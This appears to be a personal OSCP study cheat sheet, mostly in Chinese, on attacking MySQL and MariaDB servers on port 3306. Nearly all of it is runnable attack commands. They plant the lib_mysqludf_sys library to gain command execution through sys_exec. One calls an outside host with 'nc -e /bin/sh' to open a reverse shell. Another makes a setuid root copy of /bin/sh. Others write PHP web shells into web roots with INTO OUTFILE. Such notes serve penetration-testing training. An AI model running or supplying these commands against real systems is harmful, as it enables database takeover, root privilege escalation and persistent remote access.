server-mysql-port-3306 - My-oscp-all-things

### mysql-udf [FreeBuf网络安全行业门户](https://m.freebuf.com/articles/database/291175.html) https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c ``` mysql配置文件secure_file_priv项设置为空，（如果为NULL或/tmp/等指定目录，即无法自定义udf文件导出位置，则无法利用）； show variables like '%plugin%'; show variables like '%basedir%'; 查mysql安装位置 select * from mysql.user where user = substring_index(user(), '@', 1)\G; 查看权限 show variables like '%secure%'; 查可导出位置 secure_file_priv show variables like '%secure%'; SELECT @@GLOBAL.secure_file_priv; show variables like '%secure_file_priv%'; ? <5 没有？ select @@version_compile_os, @@version_compile_machine; show variables like '%compile%'; ``` cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" >5.0 ``` use mysql; create table trenchesofit(line blob); insert into trenchesofit values(load_file('/var/www/html/lib_mysqludf_sys_64.so')); insert into trenchesofit values(load_file('/tmp/lib_mysqludf_sys_64.so')); select * from trenchesofit into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so' create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; select sys_exec('nc -e /bin/sh 192.168.49.130 22'); DROP TABLE tmp; CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; //导入udf函数 drop function sys_eval; ``` <5.0 ``` select * from trenchesofit into dumpfile '/usr/lib/mysq/lib_mysqludf_sys_64.so'; ______________________没有mysql时，通过SHOW Grants;show variables; 来获取各种版本信息，主要关注 hostname plugin_dir tmpdir version_compile_machine xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex 注意这里hex需要0x ___ select @@plugin_dir select binary 0xshellcode into dumpfile '@@plugin_dir/lib_mysqludf_sys_64.so'; create function sys_exec returns int soname 'lib_mysqludf_sys_64.so'; select * from mysql.func where name='sys_exec' \G select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh') ``` oscp教程里的例子 -> 针对mria db ``` git clone https://github.com/mysqludf/lib_mysqludf_sys.git gcc -Wall -I /usr/include/mysql -I. -shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so 换成 gcc -Wall -I /usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so ``` #### MYSQL-write-shell ``` SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/sh3ll.php" select grantee, table_schema, privilege_type FROM schema_privileges;#Exact privileges select user,file_priv from mysql.user where user='root';#File privileges select load_file() select1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php' ``` 需要满足 show variables like '%secure%'; 不为空 secure_file_priv